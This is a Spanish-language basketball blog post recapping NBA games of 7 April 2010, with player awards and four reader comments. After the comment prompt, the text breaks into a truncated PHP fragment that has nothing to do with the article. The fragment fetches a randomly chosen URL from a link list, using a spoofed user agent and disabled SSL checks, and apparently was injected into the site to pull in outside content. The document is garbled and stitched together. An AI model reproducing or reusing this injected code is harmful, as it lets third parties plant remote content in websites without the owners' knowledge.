La Crónica (07/04/2010)

08 de April de 2010 por txusma

Como ya anticipamos, en esta recta final los hachazos en el Oeste van que vuelan.

El esfuerzo que tuvieron que emplear Jazz y Thunder la anterior jornada les pasó factura. Los Jazz son los grandes derrotados de la conferencia tras tropezar en Houston en la victoria nº 900 de Adelman y caen hasta la 5ª plaza. Deron Williams no fue capaz de mantener el nivel “marciano” y en ningún momento supieron parar el tridente Brooks-Martin-Scola.

Los Thunder, por su parte, sí contaron con la habitual excelsa aportación de su particular “puto Jordan”, pero tras haberse dejado remontar en el último segundo el partido anterior, se dejaron levantar ayer una diferencia de 13 puntos en el último cuarto. Tampoco es que hoy en día sea una deshonra que te la armen los Nuggets. Junto a ellos, Mavs y Suns se aprovecharon de la derrota de los Jazz, ganando fácil los primeros a los Grizzlies y los segundos llevándose una victoria muy convincente del Álamo de San Antonio.

Terminando con el Oeste, los Blazers dieron un paso de gigante para evitar a los Lakers en primera ronda resolviendo su partido contra los Clippers y aprovechando el resto de resultados. Además, Don Nelson ha batido el récord de victorias en la NBA con una actuación estelar de su pupilo Curry frente a los Wolves.

En el Este, batacazo tremebundo de los Hawks en Detroit para disfrute de los Celtics que ponen la clasificación de los Raptors en jaque… y casi mate si la lesión de Turkoglu es mínimamente grave. Por la parte alta, Orlando a lo suyo ganando a los Wizards…

Hay que destacar también la confirmación de la primera presencia en la historia de los Bobcats en postemporada. Otra medalla que se cuelga el veterano comandante Larry Brown. Anoche extraordinario broche en la cancha de unos complicadísimos Hornets.

Además de todo esto, los Bucks ganaron a los Nets, los Heat a los Sixers y los Pacers a los Knicks.

PREMIOS

MVP: Gran día para Stephen Curry, autor de 27 puntos, 14 asistencias y 7 robos. Y los Warriors, además consiguieron la victoria.

Rookie: Aparte de Stephen Curry, el pabellón de los rookies lo elevó bien alto, Marcus Thorton con 36 puntazos. Un anotador compulsivo.

Sorpresa: ¿Cuenta Anthony Tolliver como sorpresa o ya no? De todas maneras, los 34 puntos y 8 rebotes no dejan a nadie indiferente. ¿Seguirá en los Warriors el año que viene?

Decepción: No sé a vosotros pero a mi Tracy McGrady me da penita. 4 puntos con 2 de 12 en tiro en 25 minutos. ¡Con lo que había sido!

Esfuerzo en vano: Segundo premio consecutivo para Kevin Durant mano a mano con Marcus Thorton del que ya hemos hablado antes. El de los Thunder no pasó esta vez de los 40 puntos pero llegó a los 33 añadiendo 11 rebotes y 4 asistencias.

Comenta

4 comentarios a esta entrada

  1. Noelinho dice:
    #1

    Pues Curry casi firma un cuádruple doble!! 8 rebotes y 7 robos. Que bestia!

      Citar

  2. sergio dice:
    #2

    Y Curry 8 rebotes… muy muy cerca del triple doble. Aunque, tal y como comentamos, en los Warriors se inflen las estadisticas.. el final de temporada de este chaval es impresionante

      Citar

  3. sergio dice:
    #3

    del cuadruple doble….

      Citar

  4. pcerezo dice:
    #4

    Tremendo…tienes que ser muy bueno para hacer todo lo que hace. Mucha clase!!!

    Ginobili renueva con las Espuelas por tres años. Contratazo. Más de 30kilos por tres años. Tres meses jugando bien y tres años de trabajo muy bien pagados.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>